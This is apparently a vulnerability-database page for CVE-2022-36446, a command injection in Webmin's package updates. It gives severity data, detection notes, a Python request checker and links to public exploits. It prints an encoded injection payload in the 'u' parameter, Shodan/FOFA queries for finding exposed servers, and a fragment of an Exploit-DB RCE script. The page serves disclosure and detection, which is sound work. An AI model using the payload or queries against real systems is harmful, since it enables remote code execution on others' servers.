CVE-2022-36446
Published 2022-07-25
CVE-2022-36446: software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command.
Priority: P279 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 96.05% (99.9th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| webmin | webmin | < 1.997 | 1.997 |
Detection & IOCs
command: `mode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow`
- Look for POST requests to /package-updates/update.cgi with a 'u' parameter containing shell metacharacters (e.g., semicolons, encoded as %3B) indicating command injection attempts.
- Detect authenticated sessions accessing the Software Package Updates module (data-module="package-updates") followed immediately by a POST to update.cgi; this is the exploit flow.
- The exploit requires the Referer header set to the /package-updates/update.cgi?xnavigation=1 endpoint; alert on POST requests to update.cgi with this specific Referer.
- Shodan/FOFA exposure queries for Webmin instances: search for title:"Webmin" or http.title:"webmin" to identify internet-exposed targets.
- Response body containing both a repeated random string and uid/gid/groups output confirms successful RCE via the command injection payload.
- The vulnerability is in software/apt-lib.pl; monitor for unexpected child processes spawned by the Webmin process (e.g., apt, yum) with user-controlled arguments containing shell operators.
- Exploitation requires valid credentials AND the authenticated account must have access to the Software Package Updates module; unauthenticated exploitation is not possible.
- The NVD CVSS score (9.8) is rated for no authentication required (PR:N), but the actual exploit is authenticated; detections should account for the authenticated exploit path rather than the unauthenticated one.
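
The first and third detection points above, written as a request check. This is an added example, not code from any of the cited sources; the function names, the host `webmin.example` and the exact metacharacter set are assumptions, and the sample requests are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed set of characters a shell interprets; a package name never needs them.
SHELL_META = re.compile(r"[;|&$`<>(){}\\\n\r'\"]")
TARGET_PATH = "/package-updates/update.cgi"


def suspicious_u_values(body: str) -> list[str]:
    """Return URL-decoded 'u' values from a form body that contain shell metacharacters."""
    params = parse_qs(body, keep_blank_values=True)
    return [v for v in params.get("u", []) if SHELL_META.search(v)]


def assess(method: str, url: str, referer: str, body: str) -> list[str]:
    """Return the detection signals a single HTTP request matches (empty list = none)."""
    if method.upper() != "POST" or urlsplit(url).path != TARGET_PATH:
        return []
    signals = []
    bad = suspicious_u_values(body)
    if bad:
        signals.append(f"shell metacharacters in u: {bad!r}")
    ref = urlsplit(referer)
    if ref.path == TARGET_PATH and "xnavigation=1" in ref.query:
        signals.append("referer is update.cgi?xnavigation=1")
    return signals


# Constructed sample requests: (method, url, referer, body)
BASE = "https://webmin.example:10000"
SAMPLES = [
    ("POST", BASE + TARGET_PATH, BASE + "/",
     "mode=new&u=openssh-server&confirm=Install+Now"),
    ("POST", BASE + TARGET_PATH, BASE + TARGET_PATH + "?xnavigation=1",
     "mode=new&u=0%3Becho+test&confirm=Install+Now"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[3], "->", assess(*sample) or "no signal")
```

Because `parse_qs` decodes `%3B` and `+` before the check runs, encoded and literal metacharacters are treated the same.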
No detection rules found.
Exploit-DB
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
exploitdb·2022-08-01·CVSS 9.8
CVE-2022-36446 [CRITICAL] Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
---
```python
# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-25
# Exploit Author: Emir Polat
# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://www.webmin.com/download.html
# Version: sid={session.cookies['sid']}")
print(f"[+] User Found => {sysUser[0]}")
res = session.get(updateUrl)
bs = BeautifulSoup(res.text, 'html.parser')
updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]
if updateAccess[0] == "package-updates":
    print(f"[+] User '{sysUser[0]}' has permission to access >")
    print(f"[+] Exploit starting ... ")
    print(f"[+] Shell will spawn t
```
Metasploit
Webmin Package Updates RCE
metasploit
This module exploits an arbitrary command injection in Webmin versions prior to 1.997. Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possible to inject an arbitrary command that will be concatenated to the package manager call. This exploit requires authentication and the account must have access to the Software Package Updates module.
Nuclei
Webmin <1.997 - Authenticated Remote Code Execution
nuclei·CVSS 9.8
CVE-2022-36446 [CRITICAL] Webmin <1.997 - Authenticated Remote Code Execution
Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
```yaml
id: CVE-2022-36446

info:
  name: Webmin <1.997 - Authenticated Remote Code Execution
  author: gy741
  severity: critical
  description: |
    Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive informat
```
- http://packetstormsecurity.com/files/167894/Webmin-1.996-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/168049/Webmin-Package-Updates-Command-Injection.html
- https://gist.github.com/emirpolatt/cf19d6c0128fa3e25ebb47e09243919b
- https://github.com/webmin/webmin/commit/13f7bf9621a82d93f1e9dbd838d1e22020221bde
- https://github.com/webmin/webmin/compare/1.996...1.997
- https://www.exploit-db.com/exploits/50998
Published: 2022-07-25